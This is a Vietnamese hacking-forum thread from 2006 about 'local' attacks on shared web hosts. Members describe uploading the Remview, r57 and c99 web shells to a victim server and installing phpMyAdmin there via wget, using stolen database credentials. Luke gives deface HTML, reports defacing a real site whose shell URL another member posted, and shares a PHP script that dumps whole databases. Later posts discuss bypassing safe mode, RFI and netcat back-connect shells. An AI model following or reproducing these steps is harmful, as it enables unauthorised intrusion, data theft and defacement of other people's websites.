English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập Hack local  XML
Go to Page:  Page 2 Last Page
  [Question]   Hack local 27/06/2006 00:47:56 (+0700) | #1 | 1028
[Avatar]
 nln
Member
[Minus]    0    [Plus]
Joined: 26/06/2006 13:35:55
Messages: 2
Offline
[Profile] [PM] [Yahoo!]
Tui up con remview lên host rồi. Run nó, va đã xem được một số pass của SQL victim. Nhưng ko biết drop DB cũng như vào Cpanel. Anh em biết bước tiếp theo làm gì ko? Xem file config được, ko cho edit!
[Locked] [Up] [Print Copy]
  [Question]   Hack local 27/06/2006 01:43:29 (+0700) | #2 | 1063
[Avatar]
 Luke
Elite Member
[Minus]    0    [Plus]
Joined: 05/09/2002 13:21:20
Messages: 83
Offline
[Profile] [PM]
Đối với người mới tập hack local thì có thể sử dụng phpMyAdmin để access vào Database

Thực hiện các lệnh CMD Shell sau
$ cd <thư mục chmod yếu 666 hoặc 777>
Download phpMyadmin về
$ wget http://superb-east.dl.sourceforge.net/sourceforge/phpmyadmin/phpMyAdmin-2.6.3-pl1.tar.gz
Giải nén
$ gzip -d < phpMyAdmin-2.6.3-pl1.tar.gz | tar -xfv -
Đổi tên thư mục
$mv phpMyAdmin-2.6.3-pl1 sql

Sau đó dùng chương trình Remview edit file sql/config.inc.php theo thông tin về database mà lấy được

Vào phpmyadmin http://victimhost/<path>/sql/
Dùng kỹ thuật Meta Tag + HTML Code để deface trang chủ.

Ví dụ như qua phpmyadmin edit Site name, Site Description hoặc 1 trường dữ liệu nào dó hiển thị lên trang chủ thành

<html><head><title>Hacked by xLuke</title><font size=5>Hacked by xLuke <br> Contact hainamluke@yahoo.com</font><body bgcolor=#00000></head></html>

Rồi sau đó xem lại mà xem ^_^
Nếu khá HTML thì dùng DIV, hoặc SWF để deface toàn bộ
[Locked] [Up] [Print Copy]
  [Question]   Hack local 27/06/2006 02:31:47 (+0700) | #3 | 1090
[Avatar]
 nln
Member
[Minus]    0    [Plus]
Joined: 26/06/2006 13:35:55
Messages: 2
Offline
[Profile] [PM] [Yahoo!]
Ặc khó hiểu quá huynh. Http://66.246.103.230/~dianguc/rem.php
[Locked] [Up] [Print Copy]
  [Question]   Hack local 27/06/2006 04:40:05 (+0700) | #4 | 1141
[Avatar]
 dinhcaohack
Member
[Minus]    0    [Plus]
Joined: 22/04/2004 16:46:51
Messages: 41
Offline
[Profile] [PM] [Yahoo!]
<html><head><title>Hacked by xLuke</title><font size=5>Hacked by xLuke <br> Contact hainamluke@yahoo.com</font><body bgcolor=#00000></head></html>
==> virus GaiXinh huh ? Nghe wen wen smilie
[Locked] [Up] [Print Copy]
  [Question]   Hack local 27/06/2006 04:47:53 (+0700) | #5 | 1145
[Avatar]
 Luke
Elite Member
[Minus]    0    [Plus]
Joined: 05/09/2002 13:21:20
Messages: 83
Offline
[Profile] [PM]
Hix!
Tai tiếng!
[Locked] [Up] [Print Copy]
  [Question]   Hack local 27/06/2006 05:09:55 (+0700) | #6 | 1150
[Avatar]
 Luke
Elite Member
[Minus]    0    [Plus]
Joined: 05/09/2002 13:21:20
Messages: 83
Offline
[Profile] [PM]
Post URL của shell lên các diễn đàn là một việc quá nguy hiểm.
May mà mình nhanh tay deface trước và xóa con rem đó rồi!
Edit lại trang chủ nhé!
[Locked] [Up] [Print Copy]
  [Question]   Hack local 27/06/2006 05:30:51 (+0700) | #7 | 1158
[Avatar]
 dinhcaohack
Member
[Minus]    0    [Plus]
Joined: 22/04/2004 16:46:51
Messages: 41
Offline
[Profile] [PM] [Yahoo!]
May mà mình nhanh tay deface  

Nghe cái này hơi chán đấy
Đã có ý del shell đi thì deface làm j` smilie
Hay là lão định .. giữ shell làm của riêng smilie

Ặc khó hiểu quá huynh. Http://66.246.103.230/~dianguc/rem.php 

Lần sau định hỏi huynh nào thì PM cho huynh ấy, không mấy đệ vào nghịch .. ngượng quá smilie
[Locked] [Up] [Print Copy]
  [Question]   Re: Hack local 27/06/2006 05:31:11 (+0700) | #8 | 1159
[Avatar]
 nhocbmt
Member
[Minus]    0    [Plus]
Joined: 26/06/2006 17:55:21
Messages: 75
Location: Ban Mê City
Offline
[Profile] [PM] [WWW]
Code:
$ wget http://superb-east.dl.sourceforge.net/sourceforge/phpmyadmin/phpMyAdmin-2.6.3-pl1.tar.gz


Tải lên serv nặng quá dzậy lỡ bị timeout thì sao anh nhĩ ???

Sao ko tự viết 1 file php để select db nho nhỏ smilie cần gì mà phải ôm luôn cái phpmyadmin kinh dzậy smilie
[Locked] [Up] [Print Copy]
  [Question]   Hack local 27/06/2006 05:35:29 (+0700) | #9 | 1161
[Avatar]
 Luke
Elite Member
[Minus]    0    [Plus]
Joined: 05/09/2002 13:21:20
Messages: 83
Offline
[Profile] [PM]
Bác ngó xem em deface kiểu gì.
Hơi bị lịch sự.
@dianguc: Server bảo mật siêu kém. Cho thuê host thế này mất cả chì lẫn chài.
Thông báo với thằng server admin là đã mất root, còn vì sao thì:

PHP: system ("whoami");
--> dianguc

Config kiểu này, bó tay!! Mất nhà là đúng!
[Locked] [Up] [Print Copy]
  [Question]   Re: Hack local 27/06/2006 05:42:16 (+0700) | #10 | 1164
[Avatar]
 Luke
Elite Member
[Minus]    0    [Plus]
Joined: 05/09/2002 13:21:20
Messages: 83
Offline
[Profile] [PM]
Never timeout vì server của bọn SF quá xịn, file lại quá nhỏ!
Hơn nữa cài phpmyadmin chỉ mất chưa đầy 1 phút. Tool lại quá mạnh, chả tội gì đi ngồi code php.
Nói thế nhưng có lần mình hack RFI, nó chmod kỹ quá, ko setup duoc phpmyadmin, thế là phải viết MySQL -> XML
anh em có anh cần thì dùng nhé smilie
Remove một vài dòng lệnh đi là xem scheme ngon ơ, dù sao thì mình cũng rất khoái xem bằng XML ^_^

Code:
<?php
$dbhost = "localhost";
$dbuser = "ODBC";
$dbpass = "";
$dbname = "mysql";
	header('Content-Type: text/x-delimtext; name="'.$dbname.'.xml"');
	header('Content-disposition: attachment; filename="' . $dbname . '.xml"');

echo "<?xml version=\"1.0\" encoding=\"UTF-8\" ?>\n<tables>";
mysql_connect ($dbhost, $dbuser,$dbpass);
mysql_select_db($dbname);
$result = mysql_list_tables($dbname);
$num_rows = mysql_num_rows($result);
for ($i = 0; $i < $num_rows; $i++) {
    $table  = mysql_tablename($result, $i);
    echo "\n<table name=\"$table\">";
        $fresult = mysql_query("SHOW COLUMNS FROM $table");
        if (mysql_num_rows($fresult) > 0) {
            $j  = 0;
            while ($frow = mysql_fetch_assoc($fresult)) {
                $field[$j]   = $frow[Field];
                $j++;
            }
            $rresult    = mysql_query("SELECT * FROM $table");
            if (mysql_num_rows($rresult) > 0) {
                echo "<rows number=\"". mysql_num_rows($rresult) ."\">";
                while ($row = mysql_fetch_row($rresult)) {
                    echo "<row>";
                    for ($k=0; $k<$j; $k++) echo "<$field[$k]>$row[$k]</$field[$k]>";
                    echo "</row>";
                }
                echo "</rows>";
                
           }
        }        
    echo "</table>";
}
echo "</tables>";

?>
[Locked] [Up] [Print Copy]
  [Question]   Hack local 27/06/2006 05:43:07 (+0700) | #11 | 1165
[Avatar]
 dinhcaohack
Member
[Minus]    0    [Plus]
Joined: 22/04/2004 16:46:51
Messages: 41
Offline
[Profile] [PM] [Yahoo!]
Tải lên serv nặng quá dzậy lỡ bị timeout thì sao anh nhĩ ???  
Nếu server bị time out thì hack làm chi ?? Lởm wa' smilie

Bác ngó xem em deface kiểu gì.
Hơi bị lịch sự.  

Có thấy lão deface đâu nhỉ , chỉ giỏi lừa tôi :">
PHP: system ("whoami");  

Nó để thế chỉ sợ report cho chủ server nó lại chẳng hiểu j` smilie smilie
[Locked] [Up] [Print Copy]
  [Question]   Hack local 27/06/2006 05:46:54 (+0700) | #12 | 1168
[Avatar]
 Luke
Elite Member
[Minus]    0    [Plus]
Joined: 05/09/2002 13:21:20
Messages: 83
Offline
[Profile] [PM]

Có thấy lão deface đâu nhỉ , chỉ giỏi lừa tôi :">
 

http://66.246.103.230/~dianguc/

Welcome to TrangDem.Com




...:: Music ::... ...:: Forum ::...





Designed: Le Nhat Nam - Security checked: xLuke. . All infomation you can contact to: Y!ID: diangucviet
[Locked] [Up] [Print Copy]
  [Question]   Hack local 27/06/2006 05:50:44 (+0700) | #13 | 1172
[Avatar]
 ghostshadow189
Member
[Minus]    0    [Plus]
Joined: 23/08/2004 01:33:43
Messages: 59
Location: user 80183 of HVA
Offline
[Profile] [PM]
theo em nếu đã up được shell lên roài thì tha cho người ta , edit cái index thoai chứ drop database làm gì , khổ thân người ta ra smilie
[Locked] [Up] [Print Copy]
  [Question]   Re: Hack local 27/06/2006 05:56:55 (+0700) | #14 | 1175
[Avatar]
 nhocbmt
Member
[Minus]    0    [Plus]
Joined: 26/06/2006 17:55:21
Messages: 75
Location: Ban Mê City
Offline
[Profile] [PM] [WWW]
Phỏng vấn anh Luke chút smilie

Nếu nln ko đưa link rem có sẵn cho bro , thì bro có thể get được nó hông ??? 8)

hehe !

Ủa !mà nếu serv dis cmd wget thì sao mà up lên nhĩ smilie
nếu echo từng mảng lên mà owner là body thì cũng ko run được thì sao luôn nhĩ ???
[Locked] [Up] [Print Copy]
  [Question]   Re: Hack local 27/06/2006 06:01:50 (+0700) | #15 | 1177
ato
Member
[Minus]    0    [Plus]
Joined: 12/11/2004 01:59:02
Messages: 2
Offline
[Profile] [PM]
Có thể dùng con này để connect vao DB,nhỏ gọn hơn là wget toàn bộ phpmysql sang http://rapidshare.de/files/24153994/mysql.php.html
[Locked] [Up] [Print Copy]
  [Question]   Hack local 27/06/2006 06:04:01 (+0700) | #16 | 1179
[Avatar]
 Luke
Elite Member
[Minus]    0    [Plus]
Joined: 05/09/2002 13:21:20
Messages: 83
Offline
[Profile] [PM]
Nếu ko có link thì việc hack sẽ trở nên khó khăn hơn ++++++ Rất nhiều.
Với sức của Luke thì khả năng hack bất cứ site nào cũng có thể là ... không thể ^_^
Nếu không thể dùng được wget thì dùng có thể dùng copy() của PHP, chẳng thằng nào disable cái này cả.
Nếu disable tiếp thì dùng fopen(), fwrite().. lâu hơn 1 chút..
Còn nó disable tiếp thì ... nó phá sản vì chẳng thằng nào mua host của nó.
[Locked] [Up] [Print Copy]
  [Question]   Re: Hack local 27/06/2006 06:11:07 (+0700) | #17 | 1187
[Avatar]
 Luke
Elite Member
[Minus]    0    [Plus]
Joined: 05/09/2002 13:21:20
Messages: 83
Offline
[Profile] [PM]

ato wrote:
Có thể dùng con này để connect vao DB,nhỏ gọn hơn là wget toàn bộ phpmysql sang http://rapidshare.de/files/24153994/mysql.php.html 

Nói gì thì nói chứ dùng phpMyAdmin vẫn sướng nhất, mà install bằng shell command, có mất thời gian đâu.
Còn nếu dùng 1 file thì Luke khuyên dùng r57 và c99 shell
Ưu điểm của r57 là hack theo kiểu RFI rất sướng, ko cần upload ^_^
Tuy nhiên nếu tìm được weak chmod dir thì tương c99 mạnh hơn. Nhất là cái mysql function của nó. kết hợp cả 2 là tuyệt vời nhất
Để Luke up demo lên cho mọi người.
Đây cũng là một đoạn phim hacking demo rất đáng xem về kỹ thuật tấn công local, chỉ tiếc là nó dùng tiếng (*@&^@#&*^@
http://67.15.40.2/~tranphu/files/r57.rar
Mọi người xem thế nào nhé
[Locked] [Up] [Print Copy]
  [Question]   Hack local 27/06/2006 07:30:56 (+0700) | #18 | 1228
[Avatar]
 dinhcaohack
Member
[Minus]    0    [Plus]
Joined: 22/04/2004 16:46:51
Messages: 41
Offline
[Profile] [PM] [Yahoo!]
Lão Lúc lắc j` đó ơi smilie
Tôi chẳng bảo giờ up con phpmyadmin lên làm j` cả, cái j` mà cứ nhanh, dùng tốt là OK hết (r57,c99) ..
Dùng phpmyadmin chỉ là tiện ở việc .. UPDATE data một các trực quan, không phải nhớ và type lệnh .
Nếu nó dis các hàm thì làm j` (safe mode) có rất nhiều cách .. FTP_connect, copy, PHP-by pass - safe mode etc. nói chung là nhiều kỹ thuật lắm ..
Với sức của Luke thì khả năng hack bất cứ site nào cũng có thể là ... không thể ^_^  

Sao lại không thể chứ, cái server lởm òm, config kém smilie, local root tự do smilie
[Locked] [Up] [Print Copy]
  [Question]   Hack local 27/06/2006 08:08:50 (+0700) | #19 | 1241
ato
Member
[Minus]    0    [Plus]
Joined: 12/11/2004 01:59:02
Messages: 2
Offline
[Profile] [PM]
c99 có giao diện ưa nhìn,nhưng r57 dễ exec hơn.Thực ra cũng tùy từng người nhưng vẫn phải kết hợp mới hay nhất.Con mysql ato giới thiệu ở trên với mục đích không phụ thuộc nhiều lắm vào việc biết query như r57 hay c99,vì có giao diện gần giống phpmysql.Còn 1 con cgitelnet tuy rất mạnh nhưng cũng khó để up,up được thì quả là tuyệt vời.
[Locked] [Up] [Print Copy]
  [Question]   Hack local 27/06/2006 08:44:15 (+0700) | #20 | 1253
[Avatar]
 Luke
Elite Member
[Minus]    0    [Plus]
Joined: 05/09/2002 13:21:20
Messages: 83
Offline
[Profile] [PM]
Hic
Sao cái tên mình lại là Lúc Lắc
Có lẽ cái topic này cung cấp quá đủ thông tin về việc hack local rồi.
Còn kỹ năng thì phải thực tập nhiều mới biết được.

Nhớ hồi đầu, hack local phải include ("/home/.../www/forum/config.php")
sau đó up forum mình lên, sửa config cho giống.
mãi về sau mới có phpmyadmin, rồi remview
khi bị safe mode thì dùng được cgitelnet rồi MySQL LOAD INTO FILE
Bây giờ công cụ có sẵn cả, sướng thật ^_^
Dù sao cũng 4 năm rồi
Mình già rồi...
[Locked] [Up] [Print Copy]
  [Question]   Hack local 27/06/2006 09:42:28 (+0700) | #21 | 1267
[Avatar]
 dinhcaohack
Member
[Minus]    0    [Plus]
Joined: 22/04/2004 16:46:51
Messages: 41
Offline
[Profile] [PM] [Yahoo!]
Lão đúng là Lúc Lắc còn gì nữa
Chắc là tại k0 chịu học PHP , để vào DB của người ta dùng mỗi cái hàm mysql_connect() là xong, lão lại còn phpmyadmin với remview làm j` cho khổ .. còn cái include "" cũng hay đó .. mỗi tội nghe sao nó tá điền thế lão smilie

======
Còn 1 con cgitelnet tuy rất mạnh nhưng cũng khó để up,up được thì quả là tuyệt vời.
======
Mình là yêu con cgitelnet này nhất smilie, đến khi biết Putty rồi cũng thấy hay k0 kém smilie
Cách upload cgitelnet này cũng dễ thôi lão ạ, nhưng có vẻ dùng back-connect ( netcat + Putty) vẫn hay hơn smilie
Thâm nhập vẫn chỉ là thâm nhập, hack mới khó smilie
"Hacking is Get r00t" smilie
[Locked] [Up] [Print Copy]
  [Question]   Hack local 27/06/2006 10:39:41 (+0700) | #22 | 1280
kilua_vniss
Member
[Minus]    0    [Plus]
Joined: 26/06/2006 00:52:49
Messages: 16
Offline
[Profile] [PM]
dinh cao hack --->da~ get root smilie
kilua-->dang tim`hieu r00t la` cai' j` smilie
hoi luon dch r00t la` cai quai' j` vay
buc minh` ghe sao ko type duoc dau' smilie
[Locked] [Up] [Print Copy]
  [Question]   Hack local 27/06/2006 11:07:19 (+0700) | #23 | 1293
[Avatar]
 Luke
Elite Member
[Minus]    0    [Plus]
Joined: 05/09/2002 13:21:20
Messages: 83
Offline
[Profile] [PM]
Khì khì
hơn 4 năm trước tớ mới tập tọe PHP, có biết tí gì đâu
net thì phải dùng ngoài dịch vụ
dial-up chậm hơn rùa
Bây giờ thì có đủ lại lười.. ngại nghịch ngợm
Đời là thế
[Locked] [Up] [Print Copy]
  [Question]   Re: Hack local 27/06/2006 11:36:51 (+0700) | #24 | 1308
[Avatar]
 lonely_Xorhandsome
Elite Member
[Minus]    0    [Plus]
Joined: 26/06/2006 12:14:07
Messages: 558
Location: HCM beside you !
Offline
[Profile] [PM]

Luke wrote:

ato wrote:
Có thể dùng con này để connect vao DB,nhỏ gọn hơn là wget toàn bộ phpmysql sang http://rapidshare.de/files/24153994/mysql.php.html 

Nói gì thì nói chứ dùng phpMyAdmin vẫn sướng nhất, mà install bằng shell command, có mất thời gian đâu.
Còn nếu dùng 1 file thì Luke khuyên dùng r57 và c99 shell
Ưu điểm của r57 là hack theo kiểu RFI rất sướng, ko cần upload ^_^
Tuy nhiên nếu tìm được weak chmod dir thì tương c99 mạnh hơn. Nhất là cái mysql function của nó. kết hợp cả 2 là tuyệt vời nhất
Để Luke up demo lên cho mọi người.
Đây cũng là một đoạn phim hacking demo rất đáng xem về kỹ thuật tấn công local, chỉ tiếc là nó dùng tiếng (*@&^@#&*^@
http://67.15.40.2/~tranphu/files/r57.rar
Mọi người xem thế nào nhé 


anh Luke ơi cho em hỏi làm sao ma` khôg cần upload con r57 huặc c99 lên host mà vẫn có thể run nó đươc hén ?anh có thể nó rõ hơn được không ạ , cảm ơn anh nhiều .
[Locked] [Up] [Print Copy]
  [Question]   Hack local 27/06/2006 15:52:27 (+0700) | #25 | 1353
[Avatar]
 gamma95
Researcher
Joined: 20/05/2003 07:15:41
Messages: 1377
Location: aaa&quot;&gt;
Offline
[Profile] [PM] [ICQ]
lão luke thông cảm ,hồi lão local thì tụi nhỏ chưa bit bắn bi ... nên nhiều khi nghe chúng thảo luận cũng bực mình lém smilie)
Cánh chym không mỏi
lol
[Locked] [Up] [Print Copy]
  [Question]   Hack local 27/06/2006 21:37:47 (+0700) | #26 | 1391
killer_8xF
Member
[Minus]    0    [Plus]
Joined: 27/06/2006 10:24:18
Messages: 1
Offline
[Profile] [PM] [Email]
noi that nha hack kieu nay neu ko dung bat cu cong cu nao thi kho co the lam duoc
[Locked] [Up] [Print Copy]
  [Question]   Hack local 27/06/2006 22:46:04 (+0700) | #27 | 1424
[Avatar]
 dinhcaohack
Member
[Minus]    0    [Plus]
Joined: 22/04/2004 16:46:51
Messages: 41
Offline
[Profile] [PM] [Yahoo!]

anh Luke ơi cho em hỏi làm sao ma` khôg cần upload con r57 huặc c99 lên host mà vẫn có thể run nó đươc hén ?anh có thể nó rõ hơn được không ạ , cảm ơn anh nhiều 

Em k0 up 2 cái đấy thì em dùng remview hehe smilie
[Locked] [Up] [Print Copy]
  [Question]   Hack local 28/06/2006 06:50:31 (+0700) | #28 | 1539
[Avatar]
 jan
Member
[Minus]    0    [Plus]
Joined: 27/06/2006 19:39:55
Messages: 3
Offline
[Profile] [PM]
smilie hôm nào up mấy host cho anh em thực hành local A.
[Locked] [Up] [Print Copy]
  [Question]   Hack local 28/06/2006 06:52:23 (+0700) | #29 | 1541
BigballVN
Elite Member
[Minus]    0    [Plus]
Joined: 12/06/2005 07:25:21
Messages: 610
Offline
[Profile] [PM]
Hehe. good đấy. Nhanh nhanh nhé
[Locked] [Up] [Print Copy]
  [Question]   Re: Hack local 28/06/2006 06:53:51 (+0700) | #30 | 1542
[Avatar]
 nhocbmt
Member
[Minus]    0    [Plus]
Joined: 26/06/2006 17:55:21
Messages: 75
Location: Ban Mê City
Offline
[Profile] [PM] [WWW]
Nếu ko có link thì việc hack sẽ trở nên khó khăn hơn ++++++ Rất nhiều.
Với sức của Luke thì khả năng hack bất cứ site nào cũng có thể là ... không thể ^_^
Nếu không thể dùng được wget thì dùng có thể dùng copy() của PHP, chẳng thằng nào disable cái này cả.
Nếu disable tiếp thì dùng fopen(), fwrite().. lâu hơn 1 chút..
Còn nó disable tiếp thì ... nó phá sản vì chẳng thằng nào mua host của nó. 


Em đã nói nó ko echo từng mãng lên host ! vậy thì làm sao create được file php để dùng anh ???

Vd bug của phpBB chẳng hạn , nó cho phép mình remote cmd và mình đang có shell trong tay , nhưng shell này quyền hạn rất hạn chế và khó sữ dụng ! Việc của mình bây giờ là cố gắng up 1 con remv php lên host để tiện sữ dụng !

Nhưng oái ăm nó dis wget ? nếu ko có quyền nhất dịnh nó ko cũng cho dùng " echo [content] > file " ! Vậy thì còn cách nào để có 1 remv php lên host ko ????
[Locked] [Up] [Print Copy]
Go to Page:  Page 2 Last Page
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|